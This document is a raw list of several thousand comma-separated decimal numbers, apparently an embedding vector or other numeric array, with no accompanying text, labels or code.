0.01565142720937729, -0.01542231161147356, 0.03115965612232685, 0.02417164482176304, 0.0060250116512179375, -0.06363672018051147, -0.021737296134233475, 0.024744432419538498, 0.00014767184620723128, 0.02283991314470768, -0.009565556421875954, -0.003766079666092992, 0.03161788731813431, -0.03365128114819527, 0.0014668736839666963, 0.007696835789829493, -0.03940780088305473, 0.03834814205765724, 0.013481992296874523, 0.055044908076524734, -0.004843636881560087, 0.027078542858362198, 0.029928162693977356, -0.001436444348655641, -0.02921217679977417, -0.0033615482971072197, -0.03342216834425926, 0.02428620308637619, -0.018501045182347298, -0.023684775456786156, -0.027737248688936234, 0.02808092162013054, 0.0004271296493243426, -0.018959276378154755, 0.023584537208080292, -0.02119314856827259, -0.005534561816602945, 0.02478739246726036, 0.02402844838798046, -0.06174652278423309, 0.005248168017715216, 0.032391149550676346, 0.012436655350029469, -0.04252949357032776, 0.010997525416314602, -0.015178876928985119, 0.014692006632685661, 0.008735014125704765, 0.004231469705700874, 0.010095384903252125, -0.0045107039622962475, 0.011033324524760246, -0.049689341336488724, 0.004084692802280188, -0.0021694337483495474, -0.00819802563637495, 0.0043496075086295605, -0.011942625045776367, -0.016582205891609192, 0.057880207896232605, -0.014305375516414642, -0.042357657104730606, -0.00611808942630887, 0.017427068203687668, 0.003937915898859501, -0.0012950374512001872, -0.020291008055210114, -0.009307801723480225, 0.01683996059000492, -0.023699095472693443, 0.013131160289049149, 0.0023555897641927004, 0.03657250106334686, 0.01824329048395157, 0.0000173122880369192, -0.029412653297185898, -0.03809038922190666, 0.02183753438293934, 0.003599613206461072, -0.028123879805207253, 0.0018705101683735847, -0.01785665936768055, -0.013095361180603504, -0.026477115228772163, -0.008756493218243122, 0.04175623133778572, -0.005183729343116283, -0.036372024565935135, -0.005624060053378344, -0.04453425109386444, -0.01513591781258583, -0.012565531767904758, 0.04161303490400314, -0.0003083209157921374, 0.01671108417212963, 0.008047668263316154, 0.01804281584918499, 0.006297085899859667, -0.0054880231618881226, 0.012350737117230892, 0.0019474785076454282, -0.01918839104473591, 0.024558275938034058, 0.014677687548100948, 0.014606088399887085, -0.005978472530841827, 0.015164556913077831, -0.003988035023212433, -0.0004260109271854162, 0.01936022751033306, 0.0623193122446537, -0.03809038922190666, -0.0014973031356930733, -0.026018885895609856, 0.023956850171089172, 0.00804050825536251, 0.014563129283487797, -0.008183705620467663, 0.006887773051857948, -0.007306624203920364, 0.01804281584918499, 0.01141995657235384, -0.022553518414497375, -0.027780208736658096, -0.04490656405687332, 0.02573249116539955, 0.003621092764660716, -0.0032094016205519438, -0.0002467909944243729, -0.0009656844194978476, -0.01848672516644001, -0.0031252733897417784, -0.002824559807777405, -0.004156291484832764, -0.017842339351773262, 0.014620408415794373, -0.012257658876478672, -0.016811322420835495, -0.03760351985692978, 0.007245765533298254, -0.002096045296639204, 0.0022070228587836027, 0.0037302805576473475, 0.008505898527801037, -0.014026140794157982, 0.005484443157911301, 0.02524562180042267, -0.008899690583348274, 0.01830057054758072, -0.008842411451041698, -0.0023734893184155226, 0.04662492498755455, -0.0018561903852969408, -0.01728387176990509, 0.019259989261627197, 0.017269551753997803, 0.009293481707572937, -0.05670599266886711, -0.0010838218731805682, 0.025317220017313957, 0.03436726704239845, -0.01936022751033306, 0.024243243038654327, -0.023455660790205002, -0.0008717114105820656, -0.04636717215180397, -0.006773215718567371, -0.007410441990941763, -0.0027368515729904175, -0.03625746816396713, 0.028281398117542267, -0.028782585635781288, 0.019288629293441772, -0.006415223237127066, -0.01552254892885685, 0.032591626048088074, -0.0498325377702713, -0.034911416471004486, -0.00010499244672246277, -0.012601331807672977, -0.013224238529801369, -0.020921073853969574, -0.01072545163333416, -0.03998058661818504, 0.01936022751033306, -0.03708801046013832, 0.017427068203687668, -0.01628149300813675, 0.029240816831588745, 0.0005548881599679589, -0.014878163114190102, -0.026290958747267723, 0.014692006632685661, -0.05974176526069641, 0.038004469126462936, -0.015923500061035156, 0.005484443157911301, 0.0073531633242964745, -0.056247759610414505, -0.020047573372721672, -0.023312462493777275, -0.016238534823060036, 0.003037565154954791, 0.007990390062332153, 0.010496336035430431, -0.011240960098803043, 0.027049902826547623, 0.017613224685192108, 0.0012270188890397549, 0.004260109271854162, -0.004342447500675917, 0.0009151179692707956, -0.008441460318863392, 0.0050190528854727745, -0.01227197889238596, 0.00103370298165828, 0.027808846905827522, 0.03880637139081955, 0.042414937168359756, 0.010510656051337719, -0.024329161271452904, 0.0056025804951786995, -0.004099012818187475, 0.008899690583348274, -0.006880613509565592, 0.012135941535234451, -0.025216981768608093, -0.0024432979989796877, 0.013768386095762253, 0.011663391254842281, 0.010288700461387634, 0.010231422260403633, -0.002051296178251505, -0.012501093558967113, 0.014806563965976238, -0.032849378883838654, 0.04751274734735489, -0.037259846925735474, 0.035169169306755066, 0.000014865073353576008, 0.006214747671037912, 0.014398452825844288, -0.00024276357726193964, -0.029355375096201897, 0.020964033901691437, -0.02852483280003071, 0.03456774353981018, 0.0464530885219574, -0.0497179813683033, -0.011677711270749569, 0.014219457283616066, -0.043130919337272644, 0.03565603867173195, -0.027522454038262367, -0.020419884473085403, -0.05375613272190094, 0.06443862617015839, -0.046653565019369125, -0.06019999831914902, -0.035369645804166794, 0.024443719536066055, -0.030672786757349968, 0.001523257582448423, 0.023541579023003578, -0.05235280469059944, 0.026777829974889755, -0.010797049850225449, -0.0009236203040927649, -0.0021801735274493694, -0.02056308090686798, 0.021808894351124763, 0.023999808356165886, -0.005448644049465656, 0.031188296154141426, -0.03502597287297249, 0.040295619517564774, -0.035111892968416214, -0.01101184543222189, -0.000057782206567935646, 0.037002090364694595, 0.027909085154533386, -0.014849523082375526, 0.012980802915990353, -0.03482549637556076, 0.005008313339203596, -0.016682444140315056, 0.004840056877583265, 0.036429304629564285, 0.040982965379953384, 0.009930708445608616, 0.04562254622578621, -0.0030357753857970238, 0.01404046081006527, 0.017899619415402412, -0.0018490306101739407, -0.002658093348145485, -0.01765618287026882, -0.026448477059602737, -0.022796954959630966, -0.00045241284533403814, -0.021293386816978455, -0.022295765578746796, -0.027966363355517387, -0.04069657251238823, 0.0028818384744226933, -0.02964176796376705, 0.020405564457178116, -0.019073832780122757, -0.012672930024564266, 0.005015472881495953, -0.048858799040317535, 0.01110492367297411, -0.008498738519847393, 0.018143054097890854, -0.017126355320215225, -0.02202369086444378, -0.014749285764992237, -0.013517792336642742, 0.0033185891807079315, 0.019532063975930214, 0.0035280147567391396, -0.011026165448129177, -0.01526479423046112, 0.0560186468064785, 0.007403281982988119, -0.022825593128800392, 0.023512938991189003, -0.012221859768033028, -0.005015472881495953, 0.023512938991189003, 0.020104851573705673, -0.01122664101421833, -0.010954566299915314, 0.0018687201663851738, -0.043932825326919556, 0.004775618202984333, 0.00858465675264597, 0.03141741082072258, 0.004038154147565365, -0.006010692100971937, 0.03528372943401337, 0.004976093769073486, -0.03494005650281906, 0.010997525416314602, -0.04467744752764702, -0.013839985243976116, -0.022224165499210358, 0.011777948588132858, 0.024200284853577614, 0.021236106753349304, -0.012515413574874401, 0.00580305652692914, 0.005104971118271351, 0.012622810900211334, 0.008928329683840275, 0.03645794466137886, 0.01318127941340208, -0.01211446151137352, -0.03262026607990265, 0.0015098328003659844, -0.007775594480335712, -0.03714528679847717, 0.001553686917759478, 0.04132663831114769, 0.002656303346157074, 0.018844718113541603, -0.017255231738090515, 0.0294699314981699, 0.006458182353526354, 0.01494976133108139, -0.030300473794341087, -0.015007040463387966, 0.011849547736346722, 0.0020280268508940935, -0.046911321580410004, -0.0016396050341427326, 0.006826914381235838, 0.0017765371594578028, -0.04264404997229576, -0.013517792336642742, -0.046653565019369125, 0.03193292021751404, -0.017126355320215225, 0.025789771229028702, 0.016439009457826614, -0.017684822902083397, -0.012336417101323605, -0.009257682599127293, 0.027665650472044945, 0.028983062133193016, 0.0041383919306099415, 0.021966412663459778, -0.00533050624653697, 0.01841512694954872, -0.02914057858288288, -0.0010614474304020405, -0.0026401937939226627, -0.0031628625001758337, 0.020276688039302826, -0.011205160990357399, 0.017842339351773262, -0.016610845923423767, 0.035799238830804825, -0.0017980167176574469, 0.00008245011849794537, -0.020734917372465134, 0.05083491653203964, -0.03204747661948204, -0.0017192583763971925, -0.021594099700450897, 0.02530290000140667, 0.008176545612514019, 0.006848393939435482, 0.00224819197319448, 0.021937772631645203, 0.012952163815498352, -0.020921073853969574, 0.005484443157911301, 0.02719310112297535, -0.0020047572907060385, 0.012823286466300488, -0.01817169226706028, 0.007109728641808033, 0.005738617852330208, 0.025646572932600975, 0.00836270209401846, -0.009093006141483784, -0.002697472460567951, -0.03047231025993824, 0.005241008475422859, 0.017240911722183228, -0.003798299003392458, 0.022095289081335068, -0.027092862874269485, -0.021536821499466896, 0.018329208716750145, -0.00043898815056309104, 0.02808092162013054, -0.009093006141483784, -0.005158670246601105, 0.011727830395102501, -0.007474880665540695, -0.013546431437134743, 0.006293505895882845, -0.007754114922136068, -0.012565531767904758, -0.017899619415402412, -0.02548905648291111, 0.020892433822155, 0.01106912363320589, -0.02139362320303917, 0.0018597703892737627, 0.006647918373346329, -0.017899619415402412, -0.0013916953466832638, -0.0033794480841606855, -0.0012798226671293378, -0.02239600196480751, -0.013825665228068829, 0.006651498377323151, -0.009035727009177208, 0.02106427028775215, -0.011341198347508907, 0.007775594480335712, 0.002670623129233718, -0.02208096906542778, 0.0372312068939209, 0.012952163815498352, -0.03219067305326462, -0.006884193047881126, 0.01828625053167343, 0.012135941535234451, -0.01144859567284584, -0.018515365198254585, 0.05077763646841049, 0.02952721156179905, 0.02686374820768833, 0.05238144472241402, 0.0017613224918022752, 0.013002282939851284, 0.003579923650249839, 0.03854861855506897, 0.02447235770523548, -0.008061988279223442, 0.0172122735530138, 0.02359885722398758, -0.05790884420275688, 0.03562740236520767, -0.02454395778477192, 0.027522454038262367, 0.01526479423046112, -0.014992720447480679, -0.02467283420264721, -0.01961798220872879, -0.01589486189186573, -0.012794647365808487, 0.040467455983161926, -0.002249981975182891, -0.04542207345366478, -0.028238438069820404, 0.022825593128800392, 0.03720256686210632, 0.0026419837959110737, -0.028911463916301727, 0.014341174624860287, 0.0021801735274493694, 0.01918839104473591, -0.01860128343105316, 0.0020101270638406277, -0.023355422541499138, 0.0017953317146748304, 0.007696835789829493, -0.0020477164071053267, 0.008262463845312595, 0.014906802214682102, -0.034854136407375336, -0.01315979938954115, 0.002538166008889675, 0.023512938991189003, 0.044247858226299286, -0.023111987859010696, 0.011198000982403755, 0.037002090364694595, -0.006204007659107447, -0.025131063535809517, -0.00026334813446737826, -0.04247221350669861, -0.010875808075070381, -0.02219552733004093, 0.014505851082503796, -0.005133610684424639, -0.02473011240363121, -0.013302996754646301, 0.005545301828533411, 0.030128637328743935, -0.002656303346157074, 0.015622787177562714, 0.0012261238880455494, 0.020677639171481133, 0.0013782706810161471, -0.02504514530301094, -0.00007344437472056597, 0.02813819982111454, -0.028352996334433556, -0.008949809707701206, 0.0073746428824961185, -0.01754162646830082, -0.012515413574874401, 0.008026189170777798, -0.02782316692173481, 0.00810494739562273, -0.007775594480335712, -0.010739770717918873, -0.030701424926519394, -0.0033955576363950968, 0.03831950202584267, -0.013582230545580387, 0.016238534823060036, 0.03473958000540733, 0.0018365008290857077, -0.018443766981363297, 0.0017478977097198367, 0.0023770693223923445, -0.023627497255802155, -0.011026165448129177, -0.02706422284245491, 0.0037195407785475254, 0.0009817940881475806, 0.0017085185972973704, 0.013460513204336166, 0.031016459688544273, -0.011842387728393078, 0.00413481192663312, 0.009801831096410751, -0.019832776859402657, 0.00224819197319448, 0.002251771977171302, -0.02473011240363121, 0.02467283420264721, 0.010560775175690651, -0.03388039767742157, -0.0021980730816721916, -0.011720670387148857, -0.009415199048817158, 0.004156291484832764, -0.008527378551661968, -0.019030874595046043, -0.01258701179176569, -0.03949371725320816, -0.00949395727366209, 0.011477235704660416, -0.0016360251465812325, 0.013954542577266693, -0.002113944850862026, 0.011140722781419754, -0.011470075696706772, -0.023641815409064293, -0.025216981768608093, 0.018329208716750145, -0.013682468794286251, 0.014484371058642864, 0.022811273112893105, -0.003912856802344322, 0.0007911631255410612, 0.021279066801071167, 0.005931933410465717, -0.013116840273141861, 0.03216203302145004, -0.029126258566975594, -0.01154167391359806, -0.005874654743820429, 0.004818577319383621, 0.01936022751033306, -0.04447697103023529, 0.03184700012207031, -0.002810240024700761, 0.034224070608615875, 0.004814997315406799, -0.03809038922190666, -0.036114271730184555, 0.004474904853850603, 0.01974685862660408, -0.00026782305212691426, 0.013868624344468117, -0.009236203506588936, -0.009093006141483784, 0.001640500035136938, -0.020462844520807266, -0.015851901844143867, 0.019002234563231468, -0.016553567722439766, 0.006386583670973778, -0.028481872752308846, 0.02309766784310341, -0.0007777384016662836, 0.016668124124407768, -0.009744551964104176, -0.03823358565568924, 0.014219457283616066, 0.02341270074248314, -0.04719771444797516, 0.023770693689584732, 0.035484202206134796, 0.008720694109797478, 0.03319305181503296, -0.050061654299497604, 0.008942649699747562, -0.025188343599438667, -0.0019492685096338391, 0.005914033856242895, -0.014935441315174103, 0.028281398117542267, -0.010596574284136295, -0.007410441990941763, 0.0358278751373291, 0.022725354880094528, -0.008556017652153969, 0.026104804128408432, -0.0232265442609787, -0.010625213384628296, -0.01037461869418621, 0.016825640574097633, -0.007696835789829493, -0.004503543954342604, -0.015465270727872849, 0.009429519064724445, 0.021021312102675438, -0.012336417101323605, -0.020162129774689674, 0.0016933039296418428, -0.022567838430404663, -0.013152639381587505, 0.011935465969145298, -0.04000922664999962, -0.0025775451213121414, -0.00325594050809741, -0.00798323005437851, 0.01841512694954872, -0.007904471829533577, -0.0016583997057750821, -0.007589438464492559, 0.0034940054174512625, -0.008670574985444546, -0.000728067010641098, 0.00870637409389019, -0.0006989801186136901, 0.004904495552182198, -0.014584609307348728, -0.04490656405687332, 0.018128734081983566, -0.025474736467003822, 0.0035065351985394955, 0.01665380597114563, 0.00190093950368464, 0.01582326367497444, -0.006869873497635126, -0.03130285441875458, 0.0029999760445207357, 0.020018933340907097, -0.014677687548100948, 0.018701521679759026, -0.008906850591301918, 0.01154167391359806, -0.011570313014090061, 0.01691155880689621, -0.01918839104473591, -0.007703995797783136, -0.010410417802631855, -0.023183586075901985, -0.012465294450521469, -0.032276593148708344, -0.00920756347477436, 0.0036730016581714153, 0.009143125265836716, -0.01563710719347, 0.026520075276494026, 0.014376973733305931, 0.014806563965976238, 0.03379448130726814, -0.00018112176621798426, 0.0035154849756509066, -0.011190841905772686, -0.04055337607860565, 0.032648902386426926, 0.004457004833966494, 0.02365613542497158, 0.015508229844272137, -0.021551141515374184, 0.012336417101323605, 0.02219552733004093, 0.006565580144524574, -0.012594171799719334, -0.05521674454212189, 0.009450998157262802, -0.023813651874661446, -0.0044605848379433155, 0.002289361320436001, 0.007532159332185984, 0.003948655910789967, -0.02341270074248314, 0.011598953045904636, -0.0017013587057590485, -0.001778327045030892, 0.03184700012207031, 0.013925903476774693, -0.003282790072262287, 0.021121550351381302, -0.005781576968729496, 0.00492239510640502, 0.016567887738347054, -0.02195209264755249, -0.008505898527801037, -0.008169385604560375, -0.03823358565568924, 0.007088249083608389, -0.0015152026899158955, -0.008004709146916866, -0.03531236574053764, -0.034539103507995605, 0.04585166275501251, 0.04407602176070213, -0.006153889000415802, -0.028295716270804405, 0.006125249434262514, -0.02611912414431572, -0.00798323005437851, -0.018443766981363297, -0.017140675336122513, 0.021221788600087166, -0.024830350652337074, 0.017756421118974686, 0.028338676318526268, -0.004947454668581486, -0.0006425962783396244, 0.011913985945284367, 0.014305375516414642, 0.005022632889449596, -0.02385661192238331, -0.042815886437892914, -0.025030827149748802, -0.0029301675967872143, -0.04751274734735489, 0.013145479373633862, -0.00410259235650301, 0.03178972378373146, -0.009952187538146973, 0.009544076398015022, -0.013933063484728336, 0.026648951694369316, 0.003085894277319312, -0.023999808356165886, -0.028553470969200134, 0.012243338860571384, -0.002473727334290743, -0.010832848958671093, 0.00452860351651907, -0.025030827149748802, 0.00457514263689518, 0.0019635881762951612, 0.027150141075253487, -0.008620455861091614, -0.02908330038189888, 0.00008071609045146033, -0.024200284853577614, -0.040667932480573654, -0.011219481006264687, 0.010303020477294922, 0.011484394781291485, 0.00015438420814462006, 0.00039379161898978055, -0.0035763438791036606, -0.02031964622437954, -0.005774416960775852, -0.011491554789245129, -0.02169433794915676, -0.044820643961429596, -0.01334595587104559, -0.00791879091411829, -0.018944956362247467, -0.023484298959374428, 0.008305422961711884, -0.02150818146765232, -0.0278947651386261, 0.00448206439614296, 0.017842339351773262, 0.014964081346988678, 0.02838163450360298, -0.006035751197487116, -0.020348286256194115, 0.009701592847704887, 0.0025453257840126753, -0.033851757645606995, 0.011570313014090061, -0.01672540418803692, -0.020734917372465134, -0.0023609597701579332, -0.0014480791287496686, 0.010868648067116737, 0.04547934979200363, 0.013510632328689098, 0.027236059308052063, -0.0042493692599236965, -0.03508325293660164, -0.007961750030517578, -0.002888998482376337, -0.02491626888513565, 0.016739722341299057, 0.05140770599246025, -0.006393743678927422, -0.014298215508460999, -0.033021215349435806, -0.00851305853575468, 0.024586915969848633, 0.005505922716110945, 0.008262463845312595, 0.022410321980714798, 0.0004354082338977605, -0.003934336360543966, -0.03809038922190666, 0.017627544701099396, -0.005276807583868504, -0.013424714095890522, -0.037889912724494934, -0.02037692628800869, -0.024057086557149887, -0.01999029330909252, -0.003980875015258789, 0.027866126969456673, 0.0029999760445207357, -0.017484348267316818, 0.009579875506460667, 0.00791163183748722, 0.027178781107068062, -0.007299464195966721, 0.005559621378779411, -0.030300473794341087, 0.01950342394411564, 0.0038376781158149242, -0.012100142426788807, 0.013933063484728336, 0.00286214891821146, -0.013166959397494793, 0.022252805531024933, 0.02050580270588398, 0.05358429625630379, -0.02769429050385952, 0.002063825959339738, -0.020921073853969574, -0.006898513063788414, 0.006587059702724218, 0.02011917158961296, -0.0032237214036285877, -0.011792268604040146, 0.00848441943526268, 0.0015572668053209782, -0.011756469495594501, 0.01082568895071745, -0.008448620326817036, 0.01792825758457184, 0.000307202193653211, -0.00996650755405426, 0.019202711060643196, -0.03210475668311119, -0.026219360530376434, 0.004607361741364002, 0.03940780088305473, 0.002633033785969019, -0.04579438269138336, -0.010804209858179092, -0.013639509677886963, 0.023570217192173004, 0.02283991314470768, -0.012429495342075825, 0.0179712176322937, -0.023870931938290596, 0.03204747661948204, -0.03210475668311119, 0.04138391837477684, -0.032333869487047195, -0.006221907213330269, -0.0052302684634923935, 0.009343600831925869, -0.0023537997622042894, -0.014305375516414642, -0.01918839104473591, -0.0034957954194396734, -0.014441411942243576, 0.013575070537626743, -0.03620018810033798, -0.026262320578098297, -0.02663463167846203, -0.0000615299359196797, 0.005495182704180479, 0.005420004483312368, 0.007589438464492559, -0.005394944921135902, 0.005122870672494173, -0.013260037638247013, -0.026162082329392433, 0.01778506115078926, -0.020276688039302826, 0.010052425786852837, -0.016954518854618073, -0.017054757103323936, -0.021049952134490013, -0.027866126969456673, -0.024715792387723923, -0.023140626028180122, 0.011276759207248688, -0.059913601726293564, 0.004843636881560087, 0.011376997455954552, -0.027651330456137657, 0.018901996314525604, -0.02050580270588398, -0.012658610008656979, -0.023484298959374428, -0.002874678699299693, -0.030443670228123665, -0.011147882789373398, 0.02011917158961296, 0.04731227084994316, 0.07847192883491516, -0.003119903616607189, -0.0019743279553949833, -0.029312415048480034, 0.00613598944619298, -0.005702818278223276, 0.023140626028180122, 0.010503496043384075, 0.004156291484832764, 0.019274309277534485, 0.019288629293441772, -0.001362161012366414, 0.00898560881614685, 0.002683152910321951, 0.008534538559615612, 0.018901996314525604, -0.010961726307868958, -0.018586963415145874, 0.0022159728687256575, 0.0014176497934386134, -0.0031037938315421343, 0.01368962787091732, 0.019331587478518486, -0.007596598006784916, 0.024443719536066055, -0.025947287678718567, 0.0010166983120143414, -0.03073006495833397, -0.017484348267316818, -0.019274309277534485, -0.004449845291674137, -0.002684942679479718, -0.01334595587104559, 0.0005956098320893943, 0.006093030329793692, 0.009135965257883072, 0.01980413869023323, -0.014763605780899525, 0.009064367040991783, -0.010109704919159412, 0.005899714305996895, -0.009100166149437428, -0.014462891966104507, 0.01917407102882862, 0.008505898527801037, -0.013668148778378963, 0.011520194821059704, 0.003980875015258789, -0.011491554789245129, -0.0016601895913481712, -0.012715889140963554, -0.014964081346988678, 0.023197906091809273, 0.03190428018569946, -0.006386583670973778, 0.029240816831588745, -0.01702611707150936, -0.010324499569833279, -0.03554148226976395, -0.02649143524467945, -0.0048579564318060875, 0.022295765578746796, -0.001440024352632463, 0.006748156156390905, -0.007474880665540695, -0.014334014616906643, -0.010811369866132736, 0.010746930725872517, -0.014219457283616066, 0.030300473794341087, 0.003920016344636679, -0.008233824744820595, -0.0015465270262211561, -0.009107326157391071, 0.010739770717918873, 0.025589294731616974, -0.0012019593268632889, -0.013546431437134743, -0.01691155880689621, -0.005777996964752674, 0.009229043498635292, 0.028753947466611862, -0.018386488780379295, 0.018314890563488007, -0.018658561632037163, 0.027522454038262367, -0.010324499569833279, 0.010890128090977669, -0.006365104112774134, -0.015737345442175865, -0.0031109536066651344, -0.006780375260859728, 0.013517792336642742, 0.019918695092201233, 0.004786358214914799, 0.03597107157111168, 0.004073953256011009, -0.018085774034261703, 0.0028370895888656378, -0.008885370567440987, 0.018071454018354416, 0.00687703350558877, 0.024744432419538498, 0.0016959888162091374, -0.034539103507995605, 0.022238485515117645, -0.0033436487428843975, 0.006712357047945261, 0.0014749285764992237, 0.01492112223058939, -0.040095146745443344, -0.008162225596606731, 0.006740996148437262, -0.028682349249720573, -0.002228502416983247, 0.010696811601519585, 0.0018812499474734068, -0.017269551753997803, -0.020276688039302826, -0.027021264657378197, -0.024558275938034058, -0.01160611305385828, 0.028181159868836403, -0.017054757103323936, 0.011047644540667534, 0.011949785053730011, -0.0002183753385907039, -0.01980413869023323, 0.03184700012207031, 0.04630989208817482, 0.013517792336642742, 0.005939093418419361, -0.009107326157391071, -0.0075607988983392715, 0.01867288164794445, -0.01633877120912075, 0.022123929113149643, -0.001915259170345962, -0.0010041686473414302, -0.0031378031708300114, 0.002810240024700761, 0.025059465318918228, 0.034224070608615875, 0.011176521889865398, 0.004353187046945095, -0.0006502036703750491, -0.002697472460567951, 0.010589414276182652, 0.008684895001351833, 0.006515461020171642, -0.019775498658418655, -0.015737345442175865, 0.013882944360375404, 0.018658561632037163, 0.014656207524240017, -0.0008757388568483293, 0.01240085531026125, -0.012128781527280807, -0.01296648383140564, 0.017999855801463127, 0.008226664736866951, 0.010274381376802921, 0.016453329473733902, -0.01182806771248579, 0.0013908003456890583, 0.029441293329000473, -0.010639533400535583, -0.049746621400117874, -0.01691155880689621, -0.047541387379169464, 0.008577496744692326, 0.0016637695953249931, -0.018128734081983566, 0.02024804800748825, -0.00449638394638896, 0.006465342361479998, -0.030987819656729698, 0.022224165499210358, 0.03173244372010231, -0.012450974434614182, 0.000052664032409666106, 0.03393767774105072, 0.018071454018354416, 0.016138296574354172, 0.00898560881614685, -0.022739674896001816, -0.016166934743523598, 0.011470075696706772, -0.03677297756075859, 0.01053929515182972, -0.001445394242182374, 0.025403138250112534, -0.012773167341947556, -0.003887797240167856, -0.009042887017130852, -0.028553470969200134, -0.01081852987408638, -0.02700694464147091, -0.012171740643680096, 0.002871098695322871, 0.004553663078695536, -0.004106172360479832, -0.023183586075901985, 0.002151534194126725, -0.0104462169110775, -0.03683025389909744, 0.008534538559615612, 0.02915489859879017, -0.023240864276885986, -0.0062111676670610905, -0.017298191785812378, 0.027293337509036064, 0.02341270074248314, 0.005384205374866724, 0.0006331990007311106, 0.020477162674069405, 0.02680646814405918, -0.014692006632685661, 0.004224310163408518, 0.005262488033622503, -0.025073785334825516, 0.005459383595734835, 0.002665253123268485, 0.002282201312482357, -0.012071502394974232, -0.007976070046424866, 0.024816030636429787, -0.018701521679759026, 0.011355518363416195, 0.007661036681383848, -0.0006385688902810216, -0.012379376217722893, -0.005831695627421141, 0.0033132194075733423, -0.0018347109435126185, -0.008219504728913307, -0.010811369866132736, 0.016997477039694786, 0.010868648067116737, -0.01466336753219366, -0.0023949688766151667, -0.01565142720937729, -0.018687201663851738, -0.011663391254842281, -0.022639436647295952, -0.00017474502965342253, -0.005126450676470995, 0.002865728922188282, -0.00882809143513441, 0.028725307434797287, -0.0005356461042538285, -0.005394944921135902, -0.00949395727366209, -0.015794623643159866, 0.002309050876647234, 0.040725212544202805, 0.012987962923943996, 0.003631832543760538, 0.007825713604688644, 0.015193196013569832, -0.005591840948909521, -0.006919992621988058, -0.002300100866705179, 0.016138296574354172, -0.023613177239894867, 0.03748895972967148, -0.009400879964232445, -0.01046769693493843, 0.025474736467003822, -0.0011133563239127398, 0.023570217192173004, -0.00851305853575468, 0.01563710719347, -0.006021431647241116, -0.0033257491886615753, -0.0032129816245287657, -0.01641036942601204, -0.009164604358375072, -0.0018311309395357966, 0.0023878091014921665, -0.019718220457434654, 0.028796905651688576, 0.006515461020171642, -0.0340808741748333, 0.007496360223740339, -0.017312511801719666, -0.0255606546998024, 0.011856707744300365, -0.01854400523006916, -0.02289719134569168, 0.0052803875878453255, 0.017527306452393532, 0.0013039872283115983, -0.012715889140963554, 0.014878163114190102, 0.017112035304307938, -0.02334110252559185, 0.04925974830985069, -0.01419081725180149, -0.008634775876998901, 0.01626717299222946, 0.026276640594005585, 0.01689724065363407, 0.014312534593045712, -0.0063901636749506, 0.0007365692872554064, -0.026219360530376434, 0.011441436596214771, 0.010410417802631855, -0.004786358214914799, 0.0003709695884026587, -0.015508229844272137, -0.016166934743523598, -0.029670407995581627, 0.011928305961191654, 0.01028154045343399, 0.013367434963583946, -0.00286214891821146, -0.027021264657378197, 0.013646668754518032, 0.005276807583868504, -0.018973596394062042, -0.031761083751916885, -0.035111892968416214, -0.010668172501027584, 0.0042994883842766285, -0.0028370895888656378, 0.009794671088457108, 0.00801186915487051, -0.023312462493777275, 0.0033221691846847534, 0.02239600196480751, 0.022052330896258354, -0.009522597305476665, 0.001911679282784462, -0.020018933340907097, 0.00010689428745536134, 0.014391292817890644, -0.009866269305348396, -0.009279162622988224, -0.015465270727872849, 0.02069195918738842, -0.018558325245976448, 0.00581737607717514, 0.0248017106205225, 0.027279019355773926, -0.0023770693223923445, 0.0010623423149809241, 0.008520218543708324, -0.02169433794915676, -0.013045242056250572, -0.019646620377898216, -0.003945075906813145, 0.006218327675014734, -0.0022553519811481237, 0.01337459497153759, 0.015737345442175865, 0.0036497320979833603, 0.012121621519327164, -0.01015982311218977, -0.009128805249929428, 0.0009808990871533751, -0.005645539611577988, -0.0010981415398418903, 0.018314890563488007, 0.009042887017130852, -0.021465223282575607, 0.0033150094095617533, -0.01451301109045744, -0.032849378883838654, -0.004120492376387119, 0.013331635855138302, -0.010088224895298481, 0.005040532443672419, -0.004943874664604664, 0.02019076980650425, 0.01767050288617611, -0.0263768769800663, -0.029040340334177017, 0.0203053280711174, 0.005198049359023571, 0.0067946952767670155, -0.00246119755320251, 0.032906658947467804, -0.020405564457178116, 0.011527353897690773, -0.015980780124664307, 0.019975975155830383, 0.00731736421585083, -0.012100142426788807, 0.006433122791349888, 0.03250570595264435, -0.0119927441701293, 0.043932825326919556, 0.0216513779014349, 0.008477259427309036, 0.03164652734994888, -0.007292304653674364, -0.030300473794341087, 0.004038154147565365, 0.023427020758390427, 0.016295813024044037, 0.006615698803216219, 0.014964081346988678, -0.005405684933066368, -0.0013594760093837976, 0.010811369866132736, -0.011677711270749569, 0.03774671629071236, -0.0015348922461271286, -0.00017150072380900383, -0.010331659577786922, 0.018658561632037163, -0.01893063634634018, -0.00542358448728919, 0.0005857649957761168, -0.013267197646200657, 0.010217102244496346, -0.017570264637470245, 0.02341270074248314, 0.0006900302832946181, 0.011978425085544586, -0.0009692643652670085, -0.028739627450704575, 0.017828019335865974, -0.015221835114061832, 0.006916412618011236, -0.007997549138963223, 0.020076211541891098, -0.0013943802332505584, 0.0034080874174833298, 0.013933063484728336, 0.021966412663459778, 0.003433146746829152, 0.02617640234529972, 0.0011428906582295895, -0.0037231205496937037, -0.016238534823060036, -0.0033687083050608635, -0.0036730016581714153, 0.017999855801463127, 0.0005428059375844896, -0.0004640475963242352, 0.0020208668429404497, -0.0021479541901499033, -0.010410417802631855, -0.007682516239583492, -0.017126355320215225, -0.001902729389257729, 0.0033794480841606855, 0.017527306452393532, -0.0008820036891847849, -0.0015993309207260609, 0.02430052123963833, 0.005326926242560148, 0.0017434228211641312, -0.008061988279223442, -0.0057636769488453865, -0.0056276400573551655, -0.0020459264051169157, 0.025188343599438667, -0.01576598361134529, 0.019961655139923096, 0.011792268604040146, 0.0004226547316648066, 0.0030912640504539013, 0.0029176378156989813, 0.0009254102478735149, 0.009100166149437428, 0.0022177626378834248, 0.03565603867173195, -0.016567887738347054, 0.004192090593278408, 0.008441460318863392, 0.001454344019293785, -0.014555970206856728, -0.017398430034518242, -0.03193292021751404, -0.009737392887473106, 0.0007526789559051394, -0.004947454668581486, 0.00975171197205782, -0.013933063484728336, -0.008928329683840275, -0.0022428222000598907, 0.02291151136159897, 0.00760375801473856, 0.020405564457178116, 0.002865728922188282, 0.009744551964104176, 0.01404046081006527, 0.009973667562007904, -0.006851973943412304, 0.016825640574097633, 0.006934312172234058, 0.005341246258467436, 0.004539343062788248, 0.008405661210417747, 0.011384157463908195, -0.003064414719119668, 0.006433122791349888, -0.0053018671460449696, 0.023054707795381546, -0.014835203997790813, 0.00915028527379036, 0.006493981461971998, -0.021364985033869743, 0.0003051884996239096, 0.011341198347508907, -0.020405564457178116, -0.010403258726000786, 0.00996650755405426, -0.006848393939435482, 0.0086061367765069, -0.011212320998311043, 0.008649095892906189, -0.005047692451626062, 